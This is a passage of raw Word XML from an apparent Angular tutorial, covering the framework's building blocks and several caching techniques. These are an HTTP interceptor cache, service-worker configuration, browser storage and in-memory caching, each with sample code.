        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="4D733D83" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDCC224"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Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F10AABF"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Organize code and define application boundaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="55F50CF9" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590B9DC2"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Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DB00D25"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trol the UI and define views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="5F1AB42A" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34FF7FB4"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Templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48D2EEA9"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Define HTML structure and binding in the component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="450C1999" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7EA93E"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Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C2F7E45"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Share data and logic across components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="3D182FF2" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C3ED839"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Directives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F9F427"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Modify the behavior or appearance of elements in the DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7B0F52A1" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F41E18"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Pipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27336DFD"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ransform data for presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="72F49FD8" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15E1F4E2"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Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="187C4876"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Handle navigation between views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7A217961" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DA51E87"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Forms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3290DAAA"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Handle form management and validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="18BB2E7C" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713A8555"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DI (Dependency Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D19FAE6"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nject services into components or other services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="441F9C79" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF3184C"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Change Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF7FFDE"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nsure that the UI reflects the current data in the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BC2A9F9"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ach of these components plays an important role in building scalable and maintainable Angular applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F50CF" w14:textId="7BA0C062" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6DD0BAF2">
          <v:rect id="_x0000_i3540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2C0F8" w14:textId="122F6E3E" w:rsidR="00410D60" w:rsidRPr="00CE4B95" w:rsidRDefault="00300A27">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="870" w:name="_Toc196308350"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle caching in Angular</w:t>
      </w:r>
      <w:r w:rsidR="00410D60" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="870"/>
    </w:p>
    <w:p w14:paraId="202BCEDE" w14:textId="6BDC8676" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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aching in Angular can be handled in different ways depending on the scenario, such as data caching, HTTP caching, or caching UI elements. Below are some of the common approaches to handle caching in Angular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BABDA69" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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 HTTP Caching with Interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6DE17"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Angular provides a feature to intercept HTTP requests and responses using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HttpInterceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This can be used to cache API responses and avoid unnecessary network calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2DA12" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Steps to implement HTTP caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4A37B"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Create an HttpInterceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A906F57" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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An interceptor is used to intercept HTTP requests and responses, and you can add custom caching logic in this interceptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C2549"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 Injectable } from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FF42B4"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 HttpEvent, HttpInterceptor, HttpHandler, HttpRequest } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEBD6B"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 Observable } from 'rxjs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA59D65"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 tap } from 'rxjs/operators';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93F845" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA83AF8"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njectable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB1603"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CacheInterceptor implements HttpInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8235F"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private cache: Map&lt;string, any&gt; = new Map(); // Simple in-memory cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631A26C" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5930C879"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intercept(req: HttpRequest&lt;any&gt;, next: HttpHandler): Observable&lt;HttpEvent&lt;any&gt;&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87AF7C"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const cachedResponse = this.cache.get(req.urlWithParams);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364069B"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if (cachedResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E4AFD"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return new Observable(observer =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FAE38"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observer.next(cachedResponse);  // Return cached response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B59D0"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observer.complete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09312E46"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3EC8DF43"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3B29F125" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5314F02E"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return next.handle(req).pipe(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F0972"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ap(event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A5A78"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if (event instanceof HttpResponse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD7155"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his.cache.set(req.urlWithParams, event); // Store response in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55518525"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336DD048"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16DC2CF4"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17B55B78"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2382C15E"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6A410485"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Provide the Interceptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B574632" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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In your </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>app.module.ts</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, add the CacheInterceptor to the providers array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CCAE0"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 HTTP_INTERCEPTORS } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FBDA1"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lastRenderedPageBreak/>
        <w:t>import { CacheInterceptor } from './cache.interceptor';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAA38D" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF13ECD"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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E030B92"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providers: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFDCB9"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 provide: HTTP_INTERCEPTORS, useClass: CacheInterceptor, multi: true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78236245"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007DF2B2"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7AD4536D"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AppModule {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9188B7" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036AD1E"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hen a request is made, the interceptor checks if the response is cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C5387"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f the response is found in the cache, it is returned directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D5729"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Otherwise, it makes the HTTP request, stores the response in the cache, and then returns the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10456FC7" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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2. Service Worker Caching (Using PWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DDDB64"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Angular supports Progressive Web Apps (PWAs), and you can leverage </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Workers</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for caching assets and data to improve performance and offline capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24366AB7" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Steps to implement Service Worker caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8AAB9"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Install Angular PWA Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA568C"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un the following command to add PWA support to your Angular project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6FC71"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ng add @angular/pwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF751C"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Service Worker Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC88E3" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Angular automatically adds the ngsw-config.json file to your project, which defines the caching strategies for different resources, such as assets, APIs, and static content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC64E0"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Modify Caching Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can modify caching strategies in the ngsw-config.json file to define which resources should be cached and the cache's expiration policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6BB51"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ample configuration in ngsw-config.json:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CF962"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40A7C7BE"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index": "/index.html",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6A520"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assetGroups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719CC6A"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73C3C7DC"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name": "app-assets",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D73C75"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installMode": "prefetch",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34371FF5"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updateMode": "prefetch",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1D079"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resources": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29377CF6"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files": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1BC63"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favicon.ico",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336505B2"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assets/**",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45984E70"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index.html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05F12E"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22027164"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52C4D096"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6382DA5D"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2E0013C1"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dataGroups": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54029127"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01876E4C"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name": "api-data",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F0704"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urls": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD0124"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https://api.example.com/data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27819B78"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323618D2"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cacheConfig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062FC0A"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maxSize": 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BFDF9"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maxAge": "1d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB1A57"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imeout": "10s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E5021"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38C4B145"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6CD16F24"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39A1B86E"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0C2D33A6"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Build the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23190F" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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lastRenderedPageBreak/>
        <w:t>Once you set up the service worker, build your application with the --prod flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06851F4E"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ng build --prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0EB86C"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Service Worker Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5CCD8" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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he service worker caches files as per the configurations and will serve them from the cache when there is no network connection or when the network is slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E504A7F" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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3. LocalStorage and SessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39469D50"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For simple data caching that needs to persist across sessions, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DE239"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localStorage:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stores data with no expiration, even when the browser is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC8E94"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sessionStorage:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stores data for the duration of the page session (i.e., until the page is reloaded or closed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E6B6DB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Example using localStorage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C01C965"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localStorage.setItem('userData', JSON.stringify({ name: 'John Doe', age: 30 }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B981FBB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3605FC1C"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Retrieving data from localStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA59A56"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st userData = JSON.parse(localStorage.getItem('userData') || '{}');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E98C0" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Example using sessionStorage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6F0D6"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sessionStorage.setItem('sessionToken', '123456');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E241F2" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D08B2A9"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Retrieving session data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BADDC1"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st token = sessionStorage.getItem('sessionToken');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9FF37" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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4. Memory Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20D379"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n some cases, you might need to cache data temporarily within the application during the lifecycle of the app. For this, you can use a simple in-memory cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D916A"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njectable({</w:t>
      </w:r>
    </w:p>
